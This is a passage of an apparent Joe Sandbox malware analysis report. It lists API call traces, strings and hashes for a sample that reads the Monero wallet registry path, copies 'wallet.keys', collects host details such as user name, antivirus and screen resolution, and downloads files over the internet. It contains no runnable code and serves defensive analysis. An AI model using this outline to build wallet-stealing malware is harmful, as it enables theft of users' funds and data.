                                                                                                                                                                          • Part of subcall function 00181A51: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00181AE9), ref: 00181A89
                                                                                                                                                                          • Part of subcall function 00181A51: RegQueryValueExA.ADVAPI32(00181AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00181AA4
                                                                                                                                                                          • Part of subcall function 00181A51: RegCloseKey.ADVAPI32(00181AE9), ref: 00181AAD
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00181AF1
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00181AFE
                                                                                                                                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00181B19
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 00181C2A
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00181C9D
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                        • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                        • API String ID: 615783205-3586502688
                                                                                                                                                                        • Opcode ID: 3d716807d6723b0d938bebfed008e2f997b37491673b866293a101f58ec72f68
                                                                                                                                                                        • Instruction ID: 680037c701629713974c2d36eb574198f4aa937e36ad5d798ccd2b7135c4cdc4
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d716807d6723b0d938bebfed008e2f997b37491673b866293a101f58ec72f68
                                                                                                                                                                        • Instruction Fuzzy Hash: B651A672D5012D9BCF22BB64EC46ADD77B8AF24304F4144A5F608B7152DB30AF868F54
                                                                                                                                                                        Function 0018DB54 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0018DB90
                                                                                                                                                                        • strchr.MSVCRT ref: 0018DBA2
                                                                                                                                                                        • strchr.MSVCRT ref: 0018DBC7
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0018DCCC), ref: 0018DBE9
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018DBF6
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0018DCCC), ref: 0018DBFD
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018DC44
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                                                                                        • String ID: 0123456789ABCDEF
                                                                                                                                                                        • API String ID: 453150750-2554083253
                                                                                                                                                                        • Opcode ID: 1a028c021f2acf466bb046142eb739d58e8506898a7dc3a4c7c2efd6aa81fbeb
                                                                                                                                                                        • Instruction ID: f6a9eb811fa6b0c67d3a9fa21d752cd625d3565a59c4dbc81846361923722cd2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1a028c021f2acf466bb046142eb739d58e8506898a7dc3a4c7c2efd6aa81fbeb
                                                                                                                                                                        • Instruction Fuzzy Hash: 073181729002199FDB01EFE8DC49AEEBBB9EF49311F110169F901FB181DB75AA45CB50
                                                                                                                                                                        Function 0019F992 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • UnDecorator::getArgumentList.LIBCMT ref: 0019F9B7
                                                                                                                                                                          • Part of subcall function 0019F552: Replicator::operator[].LIBCMT ref: 0019F5D5
                                                                                                                                                                          • Part of subcall function 0019F552: DName::operator+=.LIBCMT ref: 0019F5DD
                                                                                                                                                                        • DName::operator+.LIBCMT ref: 0019FA10
                                                                                                                                                                        • DName::DName.LIBCMT ref: 0019FA68
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                        • API String ID: 834187326-2211150622
                                                                                                                                                                        • Opcode ID: d501407307fe1fee96d32b7a0abe341d8289cbda0ef6d817f780a151e28ff0cc
                                                                                                                                                                        • Instruction ID: 9026671aa95dd295f750728ec5a576a6407af369286745f91f812bae3371a6af
                                                                                                                                                                        • Opcode Fuzzy Hash: d501407307fe1fee96d32b7a0abe341d8289cbda0ef6d817f780a151e28ff0cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 17215970742244BFCF05DF18E9449A97BE4FB45348B4480A9E849DB266CB30EA43CB41
                                                                                                                                                                        Function 001A132B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • UnDecorator::UScore.LIBCMT ref: 001A1335
                                                                                                                                                                        • DName::DName.LIBCMT ref: 001A1341
                                                                                                                                                                          • Part of subcall function 0019F00C: DName::doPchar.LIBCMT ref: 0019F03D
                                                                                                                                                                        • UnDecorator::getScopedName.LIBCMT ref: 001A1380
                                                                                                                                                                        • DName::operator+=.LIBCMT ref: 001A138A
                                                                                                                                                                        • DName::operator+=.LIBCMT ref: 001A1399
                                                                                                                                                                        • DName::operator+=.LIBCMT ref: 001A13A5
                                                                                                                                                                        • DName::operator+=.LIBCMT ref: 001A13B2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                        • String ID: void
                                                                                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                                                                                        • Opcode ID: d49df154aa80fcbdd0cb36a2b54b1621918db420cfb0f7a23025eec75fa98aaf
                                                                                                                                                                        • Instruction ID: d10686a721753088862ea3d127a61dbc2b586203d04042a7bb86f100eb05b77f
                                                                                                                                                                        • Opcode Fuzzy Hash: d49df154aa80fcbdd0cb36a2b54b1621918db420cfb0f7a23025eec75fa98aaf
                                                                                                                                                                        • Instruction Fuzzy Hash: A7118276D04148BFCF19EF64C85AAAD7BA4FF21311F0840A9E006DB6E6DB70DA45C741
                                                                                                                                                                        Function 00191538 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0019154A
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00191555
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00191560
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0019156B
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC), ref: 00191577
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 0019157E
                                                                                                                                                                        • wsprintfA.USER32 ref: 00191590
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                        • String ID: %dx%d
                                                                                                                                                                        • API String ID: 3940144428-2206825331
                                                                                                                                                                        • Opcode ID: 4dc4a18d9684fdd16464321f48985416fb7e3241bc916cabcb0a37bfd880b6fd
                                                                                                                                                                        • Instruction ID: 3df507d4297b80a6b286044508676358331bd2168b110778e5bad3473f515894
                                                                                                                                                                        • Opcode Fuzzy Hash: 4dc4a18d9684fdd16464321f48985416fb7e3241bc916cabcb0a37bfd880b6fd
                                                                                                                                                                        • Instruction Fuzzy Hash: C3F04F76642220BBE7123BA5FC4DDAB7F6CEF4ABA5F000416FA05DB160D6B45D008BA4
                                                                                                                                                                        Function 001867ED Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00186836
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00186856
                                                                                                                                                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00186877
                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00186892
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 001868C8
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 001868F8
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00186923
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0018692A
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186936
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
